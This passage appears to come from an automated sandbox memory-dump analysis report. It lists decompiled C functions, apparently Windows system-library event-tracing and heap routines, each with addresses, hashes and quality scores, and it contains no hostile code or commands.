                                                              0x04c5151b
                                                              0x04c51526
                                                              0x04c5152c
                                                              0x04c51534
                                                              0x04c51537
                                                              0x04c5153a
                                                              0x04c51545
                                                              0x04c51557
                                                              0x04c51547
                                                              0x04c51550
                                                              0x04c51550
                                                              0x04c51562
                                                              0x04c51563
                                                              0x04c51565
                                                              0x04c5156a
                                                              0x04c5157f

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d7c70a070be44ca73511e68392c62de148679c96fb589a64f884fe01e30e15fb
                                                              • Instruction ID: f20facfe60237b8e7226ac5e1a524af8631f8aea62f8b7eb88c768c87860ad8e
                                                              • Opcode Fuzzy Hash: d7c70a070be44ca73511e68392c62de148679c96fb589a64f884fe01e30e15fb
                                                              • Instruction Fuzzy Hash: 41019271E01258AFDB04DFA9D845FAEB7B8EF44710F44409AF905EB280EA74EE41CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 61%
                                                              			E04C5138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                              				signed int _v8;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				short _v54;
                                                              				char _v60;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed char* _t21;
                                                              				intOrPtr _t27;
                                                              				intOrPtr _t33;
                                                              				intOrPtr _t34;
                                                              				signed int _t35;
                                                              
                                                              				_t32 = __edx;
                                                              				_t27 = __ebx;
                                                              				_v8 =  *0x4c8d360 ^ _t35;
                                                              				_t33 = __edx;
                                                              				_t34 = __ecx;
                                                              				E04BDFA60( &_v60, 0, 0x30);
                                                              				_v20 = _a4;
                                                              				_v16 = _a8;
                                                              				_v28 = _t34;
                                                              				_v24 = _t33;
                                                              				_v54 = 0x1033;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t21 = 0x7ffe0388;
                                                              				} else {
                                                              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                              				}
                                                              				_push( &_v60);
                                                              				_push(0x10);
                                                              				_push(0x20402);
                                                              				_push( *_t21 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                              			}

















                                                              0x04c5138a
                                                              0x04c5138a
                                                              0x04c51399
                                                              0x04c513a3
                                                              0x04c513a8
                                                              0x04c513aa
                                                              0x04c513b5
                                                              0x04c513bb
                                                              0x04c513c3
                                                              0x04c513c6
                                                              0x04c513c9
                                                              0x04c513d4
                                                              0x04c513e6
                                                              0x04c513d6
                                                              0x04c513df
                                                              0x04c513df
                                                              0x04c513f1
                                                              0x04c513f2
                                                              0x04c513f4
                                                              0x04c513f9
                                                              0x04c5140e

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2e9f1a8d11b6068d9f20ed726d28be925f805d823692a9e2591fd221a7a922ea
                                                              • Instruction ID: 072b216b82332c2e8b1daa6f90aaf22a2f6c2f8f1d2b37c9c1aba869ccceff5d
                                                              • Opcode Fuzzy Hash: 2e9f1a8d11b6068d9f20ed726d28be925f805d823692a9e2591fd221a7a922ea
                                                              • Instruction Fuzzy Hash: 4D015271E04218AFDB14DFA9D845FAEB7B8EF44710F0440AAF905EB280EA74AE41C794
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04BAB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
                                                              				signed char _t11;
                                                              				signed char* _t12;
                                                              				intOrPtr _t24;
                                                              				signed short* _t25;
                                                              
                                                              				_t25 = __edx;
                                                              				_t24 = __ecx;
                                                              				_t11 = ( *[fs:0x30])[0x50];
                                                              				if(_t11 != 0) {
                                                              					if( *_t11 == 0) {
                                                              						goto L1;
                                                              					}
                                                              					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
                                                              					L2:
                                                              					if( *_t12 != 0) {
                                                              						_t12 =  *[fs:0x30];
                                                              						if((_t12[0x240] & 0x00000004) == 0) {
                                                              							goto L3;
                                                              						}
                                                              						if(E04BB7D50() == 0) {
                                                              							_t12 = 0x7ffe0385;
                                                              						} else {
                                                              							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
                                                              						}
                                                              						if(( *_t12 & 0x00000020) == 0) {
                                                              							goto L3;
                                                              						}
                                                              						return E04C17016(_a4, _t24, 0, 0, _t25, 0);
                                                              					}
                                                              					L3:
                                                              					return _t12;
                                                              				}
                                                              				L1:
                                                              				_t12 = 0x7ffe0384;
                                                              				goto L2;
                                                              			}







                                                              0x04bab037
                                                              0x04bab039
                                                              0x04bab03b
                                                              0x04bab040
                                                              0x04bfa60e
                                                              0x00000000
                                                              0x00000000
                                                              0x04bfa61d
                                                              0x04bab04b
                                                              0x04bab04e
                                                              0x04bfa627
                                                              0x04bfa634
                                                              0x00000000
                                                              0x00000000
                                                              0x04bfa641
                                                              0x04bfa653
                                                              0x04bfa643
                                                              0x04bfa64c
                                                              0x04bfa64c
                                                              0x04bfa65b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04bfa66c
                                                              0x04bab057
                                                              0x04bab057
                                                              0x04bab057
                                                              0x04bab046
                                                              0x04bab046
                                                              0x00000000

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                              • Instruction ID: e9b9c233984c4055b673e041ba2870839c03f4cb1e980d432b17ec6ea630f5a4
                                                              • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                              • Instruction Fuzzy Hash: 250171712095809FD326C76CC944F6677D8EB45754F0940E1EA29CBA51D668FC40D620
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04C61074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                                              				char _v8;
                                                              				void* _v11;
                                                              				unsigned int _v12;
                                                              				void* _v15;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				char* _t16;
                                                              				signed int* _t35;
                                                              
                                                              				_t22 = __ebx;
                                                              				_t35 = __ecx;
                                                              				_v8 = __edx;
                                                              				_t13 =  !( *__ecx) + 1;
                                                              				_v12 =  !( *__ecx) + 1;
                                                              				if(_a4 != 0) {
                                                              					E04C6165E(__ebx, 0x4c88ae4, (__edx -  *0x4c88b04 >> 0x14) + (__edx -  *0x4c88b04 >> 0x14), __edi, __ecx, (__edx -  *0x4c88b04 >> 0x14) + (__edx -  *0x4c88b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                                              				}
                                                              				E04C5AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
                                                              				if(E04BB7D50() == 0) {
                                                              					_t16 = 0x7ffe0388;
                                                              				} else {
                                                              					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                              				}
                                                              				if( *_t16 != 0) {
                                                              					_t16 = E04C4FE3F(_t22, _t35, _v8, _v12);
                                                              				}
                                                              				return _t16;
                                                              			}











                                                              0x04c61074
                                                              0x04c61080
                                                              0x04c61082
                                                              0x04c6108a
                                                              0x04c6108f
                                                              0x04c61093
                                                              0x04c610ab
                                                              0x04c610ab
                                                              0x04c610c3
                                                              0x04c610cf
                                                              0x04c610e1
                                                              0x04c610d1
                                                              0x04c610da
                                                              0x04c610da
                                                              0x04c610e9
                                                              0x04c610f5
                                                              0x04c610f5
                                                              0x04c610fe

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a5c0ef9fe3aca41a3f1fb3ce3759526524dc0be4e4d4798085ef1e8d43bcb802
                                                              • Instruction ID: 65d325bfdcb306c76421774a5cb37ca9bf7d7d325f143c04649a31bca051ccd9
                                                              • Opcode Fuzzy Hash: a5c0ef9fe3aca41a3f1fb3ce3759526524dc0be4e4d4798085ef1e8d43bcb802
                                                              • Instruction Fuzzy Hash: BE014C725047419FD710EF29C940B1A77E6EBC4315F08C629F88683690EE71F941DBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 59%
                                                              			E04C4FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                              				signed int _v12;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				short _v58;
                                                              				char _v64;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed char* _t18;
                                                              				intOrPtr _t24;
                                                              				intOrPtr _t30;
                                                              				intOrPtr _t31;
                                                              				signed int _t32;
                                                              
                                                              				_t29 = __edx;
                                                              				_t24 = __ebx;
                                                              				_v12 =  *0x4c8d360 ^ _t32;
                                                              				_t30 = __edx;
                                                              				_t31 = __ecx;
                                                              				E04BDFA60( &_v64, 0, 0x30);
                                                              				_v24 = _a4;
                                                              				_v32 = _t31;
                                                              				_v28 = _t30;
                                                              				_v58 = 0x266;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t18 = 0x7ffe0388;
                                                              				} else {
                                                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                              				}
                                                              				_push( &_v64);
                                                              				_push(0x10);
                                                              				_push(0x20402);
                                                              				_push( *_t18 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                              			}
















                                                              0x04c4fec0
                                                              0x04c4fec0
                                                              0x04c4fecf
                                                              0x04c4fed9
                                                              0x04c4fede
                                                              0x04c4fee0
                                                              0x04c4feeb
                                                              0x04c4fef3
                                                              0x04c4fef6
                                                              0x04c4fef9
                                                              0x04c4ff04
                                                              0x04c4ff16
                                                              0x04c4ff06
                                                              0x04c4ff0f
                                                              0x04c4ff0f
                                                              0x04c4ff21
                                                              0x04c4ff22
                                                              0x04c4ff24
                                                              0x04c4ff29
                                                              0x04c4ff3e

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86280a3543a7d2ca9270fb35bc1e30c58de96c3e788e92f0f49d4214bbc254f6
                                                              • Instruction ID: 64f70b49a1921be9644a1311836b67b86fdec0cfbec02f11f7a85492449f3864
                                                              • Opcode Fuzzy Hash: 86280a3543a7d2ca9270fb35bc1e30c58de96c3e788e92f0f49d4214bbc254f6
                                                              • Instruction Fuzzy Hash: 7C018871E04218ABD714DFA9D945FAEB7B8EF45714F0440AAF9019B280E974AE01C794
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 59%
                                                              			E04C4FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                              				signed int _v12;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				short _v58;
                                                              				char _v64;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed char* _t18;
                                                              				intOrPtr _t24;
                                                              				intOrPtr _t30;
                                                              				intOrPtr _t31;
                                                              				signed int _t32;
                                                              
                                                              				_t29 = __edx;
                                                              				_t24 = __ebx;
                                                              				_v12 =  *0x4c8d360 ^ _t32;
                                                              				_t30 = __edx;
                                                              				_t31 = __ecx;
                                                              				E04BDFA60( &_v64, 0, 0x30);
                                                              				_v24 = _a4;
                                                              				_v32 = _t31;
                                                              				_v28 = _t30;
                                                              				_v58 = 0x267;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t18 = 0x7ffe0388;
                                                              				} else {
                                                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                              				}
                                                              				_push( &_v64);
                                                              				_push(0x10);
                                                              				_push(0x20402);
                                                              				_push( *_t18 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
                                                              			}
















                                                              0x04c4fe3f
                                                              0x04c4fe3f
                                                              0x04c4fe4e
                                                              0x04c4fe58
                                                              0x04c4fe5d
                                                              0x04c4fe5f
                                                              0x04c4fe6a
                                                              0x04c4fe72
                                                              0x04c4fe75
                                                              0x04c4fe78
                                                              0x04c4fe83
                                                              0x04c4fe95
                                                              0x04c4fe85
                                                              0x04c4fe8e
                                                              0x04c4fe8e
                                                              0x04c4fea0
                                                              0x04c4fea1
                                                              0x04c4fea3
                                                              0x04c4fea8
                                                              0x04c4febd

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e36ecf7b76ad9575bb7dba4cb0bf4d992fce76280edc8ca0889560afceedfbaa
                                                              • Instruction ID: 3876f76abe0098705b8cfb0f53f7953e15c5756e928488398f32bf13c77827a4
                                                              • Opcode Fuzzy Hash: e36ecf7b76ad9575bb7dba4cb0bf4d992fce76280edc8ca0889560afceedfbaa
                                                              • Instruction Fuzzy Hash: B7018871E04618ABD714DFA9D845FAEB7B8EF44714F0440AAF9019B281E974AA01C795
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 54%
                                                              			E04C68ED6(intOrPtr __ecx, intOrPtr __edx) {
                                                              				signed int _v8;
                                                              				signed int _v12;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				intOrPtr _v36;
                                                              				short _v62;
                                                              				char _v68;
                                                              				signed char* _t29;
                                                              				intOrPtr _t35;
                                                              				intOrPtr _t41;
                                                              				intOrPtr _t42;
                                                              				signed int _t43;
                                                              
                                                              				_t40 = __edx;
                                                              				_v8 =  *0x4c8d360 ^ _t43;
                                                              				_v28 = __ecx;
                                                              				_v62 = 0x1c2a;
                                                              				_v36 =  *((intOrPtr*)(__edx + 0xc8));
                                                              				_v32 =  *((intOrPtr*)(__edx + 0xcc));
                                                              				_v20 =  *((intOrPtr*)(__edx + 0xd8));
                                                              				_v16 =  *((intOrPtr*)(__edx + 0xd4));
                                                              				_v24 = __edx;
                                                              				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t29 = 0x7ffe0386;
                                                              				} else {
                                                              					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              				}
                                                              				_push( &_v68);
                                                              				_push(0x1c);
                                                              				_push(0x20402);
                                                              				_push( *_t29 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
                                                              			}


















                                                              0x04c68ed6
                                                              0x04c68ee5
                                                              0x04c68eed
                                                              0x04c68ef0
                                                              0x04c68efa
                                                              0x04c68f03
                                                              0x04c68f0c
                                                              0x04c68f15
                                                              0x04c68f24
                                                              0x04c68f27
                                                              0x04c68f31
                                                              0x04c68f43
                                                              0x04c68f33
                                                              0x04c68f3c
                                                              0x04c68f3c
                                                              0x04c68f4e
                                                              0x04c68f4f
                                                              0x04c68f51
                                                              0x04c68f56
                                                              0x04c68f69

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6bdafcc50887d070f1596140821299cacfb4443080eb8ef9405543429ee04e05
                                                              • Instruction ID: 3ebcd2d60579e91e7d8f31f39b13a7aaaf961c8e53c38c23e9a414c9e3d9fcdd
                                                              • Opcode Fuzzy Hash: 6bdafcc50887d070f1596140821299cacfb4443080eb8ef9405543429ee04e05
                                                              • Instruction Fuzzy Hash: 50112170E052199FDB04DFA9D441BAEF7F4FF08300F0442AAE519EB382E634A940CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 54%
                                                              			E04C68A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                              				signed int _v12;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				intOrPtr _v36;
                                                              				intOrPtr _v40;
                                                              				short _v66;
                                                              				char _v72;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed char* _t18;
                                                              				signed int _t32;
                                                              
                                                              				_t29 = __edx;
                                                              				_v12 =  *0x4c8d360 ^ _t32;
                                                              				_t31 = _a8;
                                                              				_t30 = _a12;
                                                              				_v66 = 0x1c20;
                                                              				_v40 = __ecx;
                                                              				_v36 = __edx;
                                                              				_v32 = _a4;
                                                              				_v28 = _a8;
                                                              				_v24 = _a12;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t18 = 0x7ffe0386;
                                                              				} else {
                                                              					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              				}
                                                              				_push( &_v72);
                                                              				_push(0x14);
                                                              				_push(0x20402);
                                                              				_push( *_t18 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
                                                              			}
















                                                              0x04c68a62
                                                              0x04c68a71
                                                              0x04c68a79
                                                              0x04c68a82
                                                              0x04c68a85
                                                              0x04c68a89
                                                              0x04c68a8c
                                                              0x04c68a8f
                                                              0x04c68a92
                                                              0x04c68a95
                                                              0x04c68a9f
                                                              0x04c68ab1
                                                              0x04c68aa1
                                                              0x04c68aaa
                                                              0x04c68aaa
                                                              0x04c68abc
                                                              0x04c68abd
                                                              0x04c68abf
                                                              0x04c68ac4
                                                              0x04c68ada

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0fa08c78af7226f3c274f02b13ed446046188c713380e6868935787e29268780
                                                              • Instruction ID: a6f26daeaed3bcd751773a2387777c5b7a6976c6b44e2fc69acc489ff63ddb42
                                                              • Opcode Fuzzy Hash: 0fa08c78af7226f3c274f02b13ed446046188c713380e6868935787e29268780
                                                              • Instruction Fuzzy Hash: 260121B1A0121D9FDB04DFA9D9419EEB7B8EF48710F10409AF905E7341EA34AD01CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04B9DB60(signed int __ecx) {
                                                              				intOrPtr* _t9;
                                                              				void* _t12;
                                                              				void* _t13;
                                                              				intOrPtr _t14;
                                                              
                                                              				_t9 = __ecx;
                                                              				_t14 = 0;
                                                              				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
                                                              					_t13 = 0xc000000d;
                                                              				} else {
                                                              					_t14 = E04B9DB40();
                                                              					if(_t14 == 0) {
                                                              						_t13 = 0xc0000017;
                                                              					} else {
                                                              						_t13 = E04B9E7B0(__ecx, _t12, _t14, 0xfff);
                                                              						if(_t13 < 0) {
                                                              							L04B9E8B0(__ecx, _t14, 0xfff);
                                                              							L04BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
                                                              							_t14 = 0;
                                                              						} else {
                                                              							_t13 = 0;
                                                              							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
                                                              						}
                                                              					}
                                                              				}
                                                              				 *_t9 = _t14;
                                                              				return _t13;
                                                              			}







                                                              0x04b9db64
                                                              0x04b9db66
                                                              0x04b9db6b
                                                              0x04b9dbaa
                                                              0x04b9db71
                                                              0x04b9db76
                                                              0x04b9db7a
                                                              0x04b9dba3
                                                              0x04b9db7c
                                                              0x04b9db87
                                                              0x04b9db8b
                                                              0x04bf4fa1
                                                              0x04bf4fb3
                                                              0x04bf4fb8
                                                              0x04b9db91
                                                              0x04b9db96
                                                              0x04b9db98
                                                              0x04b9db98
                                                              0x04b9db8b
                                                              0x04b9db7a
                                                              0x04b9db9d
                                                              0x04b9dba2

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                              • Instruction ID: 92287a91ce090b056458ead4a63e7ab099444139a9e44f8bd67a645b9214783b
                                                              • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                              • Instruction Fuzzy Hash: CDF0C8332015229BEB725A974890B67B6DD8FC1B64F1600B5B1099B244CB60AC0296D1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E04B9B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
                                                              				signed char* _t13;
                                                              				intOrPtr _t22;
                                                              				char _t23;
                                                              
                                                              				_t23 = __edx;
                                                              				_t22 = __ecx;
                                                              				if(E04BB7D50() != 0) {
                                                              					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
                                                              				} else {
                                                              					_t13 = 0x7ffe0384;
                                                              				}
                                                              				if( *_t13 != 0) {
                                                              					_t13 =  *[fs:0x30];
                                                              					if((_t13[0x240] & 0x00000004) == 0) {
                                                              						goto L3;
                                                              					}
                                                              					if(E04BB7D50() == 0) {
                                                              						_t13 = 0x7ffe0385;
                                                              					} else {
                                                              						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
                                                              					}
                                                              					if(( *_t13 & 0x00000020) == 0) {
                                                              						goto L3;
                                                              					}
                                                              					return E04C17016(0x14a4, _t22, _t23, _a4, _a8, 0);
                                                              				} else {
                                                              					L3:
                                                              					return _t13;
                                                              				}
                                                              			}






                                                              0x04b9b1e8
                                                              0x04b9b1ea
                                                              0x04b9b1f3
                                                              0x04bf4a17
                                                              0x04b9b1f9
                                                              0x04b9b1f9
                                                              0x04b9b1f9
                                                              0x04b9b201
                                                              0x04bf4a21
                                                              0x04bf4a2e
                                                              0x00000000
                                                              0x00000000
                                                              0x04bf4a3b
                                                              0x04bf4a4d
                                                              0x04bf4a3d
                                                              0x04bf4a46
                                                              0x04bf4a46
                                                              0x04bf4a55
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x04b9b20a
                                                              0x04b9b20a
                                                              0x04b9b20a
                                                              0x04b9b20a

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                              • Instruction ID: 4fee588129b9ae66c54b60a894237feadb95be8ad19051309043140780cc6031
                                                              • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                              • Instruction Fuzzy Hash: 9B01D1322046809BDB269B5DDC04F6A7BD9FF92754F0804F2FA188B6B1EA78FC01D214
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 46%
                                                              			E04C2FE87(intOrPtr __ecx) {
                                                              				signed int _v8;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				signed int _v24;
                                                              				intOrPtr _v28;
                                                              				short _v54;
                                                              				char _v60;
                                                              				signed char* _t21;
                                                              				intOrPtr _t27;
                                                              				intOrPtr _t32;
                                                              				intOrPtr _t33;
                                                              				intOrPtr _t34;
                                                              				signed int _t35;
                                                              
                                                              				_v8 =  *0x4c8d360 ^ _t35;
                                                              				_v16 = __ecx;
                                                              				_v54 = 0x1722;
                                                              				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                                              				_v28 =  *((intOrPtr*)(__ecx + 4));
                                                              				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                                              				if(E04BB7D50() == 0) {
                                                              					_t21 = 0x7ffe0382;
                                                              				} else {
                                                              					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                                              				}
                                                              				_push( &_v60);
                                                              				_push(0x10);
                                                              				_push(0x20402);
                                                              				_push( *_t21 & 0x000000ff);
                                                              				return E04BDB640(E04BD9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                              			}
















                                                              0x04c2fe96
                                                              0x04c2fe9e
                                                              0x04c2fea1
                                                              0x04c2fead
                                                              0x04c2feb3
                                                              0x04c2feb9
                                                              0x04c2fec3
                                                              0x04c2fed5
                                                              0x04c2fec5
                                                              0x04c2fece
                                                              0x04c2fece
                                                              0x04c2fee0
                                                              0x04c2fee1
                                                              0x04c2fee3
                                                              0x04c2fee8
                                                              0x04c2fefb

                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp Download File
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 92f55eae3dea6b7aafd34d146f4d430eb7b9eddff5c449dac64878819593f2c9
                                                              • Instruction ID: 34cc80f4b2f648d5929988ef06fbdea8646444bb198a6de181935f460473419d
                                                              • Opcode Fuzzy Hash: 92f55eae3dea6b7aafd34d146f4d430eb7b9eddff5c449dac64878819593f2c9
                                                              • Instruction Fuzzy Hash: 78016274A0421CAFCB14DFA8D541A6EB7F4EF04304F144199B505DB382EA75EA01DB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 48%
                                                              			E04C68F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                              				signed int _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				short _v50;
                                                              				char _v56;
                                                              				signed char* _t18;
                                                              				intOrPtr _t24;
                                                              				intOrPtr _t30;
                                                              				intOrPtr _t31;
                                                              				signed int _t32;
                                                              
                                                              				_t29 = __edx;
                                                              				_v8 =  *0x4c8d360 ^ _t32;
                                                              				_v16 = __ecx;
                                                              				_v50 = 0x1c2c;
                                                              				_v24 = _a4;
                                                              				_v20 = _a8;
                                                              				_v12 = __edx;
                                                              				if(E04BB7D50() == 0) {
                                                              					_t18 = 0x7ffe0386;
                                                              				} else {
